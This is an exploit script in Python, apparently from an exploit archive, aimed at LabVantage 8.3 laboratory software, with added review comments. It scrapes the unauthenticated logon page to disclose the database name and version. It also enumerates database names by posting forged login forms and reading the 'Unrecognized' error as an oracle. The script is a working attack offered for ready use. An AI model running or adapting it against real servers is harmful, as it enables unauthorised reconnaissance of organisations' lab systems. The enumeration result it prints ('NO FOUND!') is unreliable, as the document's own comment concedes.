# Exploit Title: LabVantage 8.3 - Information Disclosure  
# Google Dork: N/A  
# Date: 2020-02-16  
# Exploit Author: Joel Aviad Ossi  
# Vendor Homepage: labvantage.com  
# Software Link: N/A  
# Version: LabVantage 8.3  
# Tested on: *  
# CVE : N/A  
  
  
import requests  
import operator  
  
  
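def _slice_between(text, begin_marker, end_marker):
    """Return the text after the first begin_marker, up to the last end_marker.

    Returns "" when either marker is missing or the end marker precedes the
    start, instead of slicing from a bogus index produced by find() == -1.
    """
    begin = text.find(begin_marker)
    stop = text.rfind(end_marker)
    if begin == -1 or stop == -1:
        return ""
    begin += len(begin_marker)
    if stop < begin:
        return ""
    return text[begin:stop]


def exploit(target):
    """Fetch the logon page at *target* and print the values it discloses.

    The page is requested without credentials. Two values are read from the
    returned HTML: the pre-filled ``database`` form field and the ``title``
    attribute of the logo image, which this script reports as the version.

    Args:
        target: Full URL of the logon page (scheme included).

    Raises:
        requests.exceptions.RequestException: on connection failure or timeout.
    """
    print("[+] Fetching LabVantage Database Name..")
    # The disclosure is this form field: its value attribute carries the
    # database name in the HTML served before any logon has happened.
    db_open = 'name="database" id="database" value="'
    db_close = '" >'
    ver_open = '<img src="WEB-OPAL/layouts/images/logo_white.png" title="'
    ver_close = "viewportTest"
    print("[+] Testing URL: " + target)
    # Bounded wait: without a timeout requests can block indefinitely on a
    # host that accepts the connection but never answers.
    page = requests.get(target, timeout=10).text
    if db_open not in page:
        # This is a second fetch after the caller's check; do not report a
        # finding when the field is absent from the page actually parsed.
        print("[-] Not Vulnerable!")
        return
    # NOTE(review): the end of each value is located with rfind(), i.e. the
    # LAST occurrence of the closing marker in the page. That presumably
    # matches the markup of the tested build; confirm before trusting the
    # printed value on other versions.
    print("[+] DB: " + _slice_between(page, db_open, db_close))
    # NOTE(review): the fixed 71-character trim presumably removes the markup
    # between the title text and "viewportTest" on the tested build -- verify.
    print("[+] VERSION: " + _slice_between(page, ver_open, ver_close)[:-71])
    print("[+] Vulnerable!")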
  
  
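def vuln_check():
    """Prompt for a host and check whether its logon page exposes the database field.

    Requests ``/labservices/logon.jsp`` without credentials and looks for the
    ``database`` form field markup. When the markup is present the URL is
    handed to ``exploit`` to print the disclosed values; otherwise the
    process exits with status 0.

    The check is a plain substring match, so any page that contains the
    markup is reported, whatever product served it.

    Raises:
        requests.exceptions.RequestException: on connection failure or timeout.
        SystemExit: when the field markup is not found.
    """
    # requests rejects URLs without a scheme, so the example shows one
    # (same form as the prompt in attack()).
    target = input("\nTARGET HOST URL (example: http://target.com:8080): ")
    print('[+] Checking if Host is vulnerable.')
    target = str(target) + "/labservices/logon.jsp"
    # Bounded wait so an unresponsive host cannot hang the check.
    page = requests.get(target, timeout=10).text
    field_markup = 'name="database" id="database" value="'
    if field_markup not in page:
        print("[-] Not Vulnerable!")
        # The bare exit() helper is injected by the site module and is not
        # guaranteed to exist; SystemExit is what it raises anyway.
        raise SystemExit(0)
    exploit(target)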
  
  
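def attack():
    """Prompt for a host and a database name and test the name against the login endpoint.

    Posts a logon form to ``/labservices/rc?command=login`` with placeholder
    credentials and the supplied database name, then looks for the word
    "Unrecognized" in the response body. The endpoint answering differently
    for unknown names is what makes name enumeration possible; a uniform
    failure response for every rejected logon would close that oracle.

    Raises:
        requests.exceptions.RequestException: on connection failure or timeout.
    """
    target = input("\nTARGET HOST URL (example: http://target.com:8080): ")
    enum = input("\nDB NAME TO CHECK: ")
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    # Every field except the database name is the literal string 'null'.
    payload = {
        'nexturl': 'null',
        'ignorelogonurl': 'N',
        'ignoreexpirywarning': 'false',
        '_viewport': 'null',
        'username': 'null',
        'password': 'null',
        'database': str(enum),
        'csrftoken': 'null',
    }
    target = str(target) + "/labservices/rc?command=login"
    print("[+] Testing URL: " + target)
    # Bounded wait so an unresponsive host cannot hang the run.
    response = requests.post(target, headers=headers, data=payload, timeout=10)
    body = response.text
    if "Unrecognized" in body:
        print('[+] DB NOT FOUND!')
    else:
        # NOTE(review): this branch runs for ANY body without "Unrecognized",
        # including error pages or a host that is not LabVantage at all, and
        # the HTTP status is never inspected. Treat the result as "name not
        # rejected", not as confirmation that the database exists.
        print('[!] NO FOUND!')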
  
  
# Interactive entry point: show the menu, read one choice, run the matching
# routine. Anything other than "1" or "2" prints an error and ends the script.
print("\n1. Vulnerability Check\n2. DB Name Enumeration\n")
option = input("CHOSE OPTION: ")
_menu = {"1": vuln_check, "2": attack}
_selected = _menu.get(option)
if _selected is None:
    print("Wrong option selected, try again!")
else:
    _selected()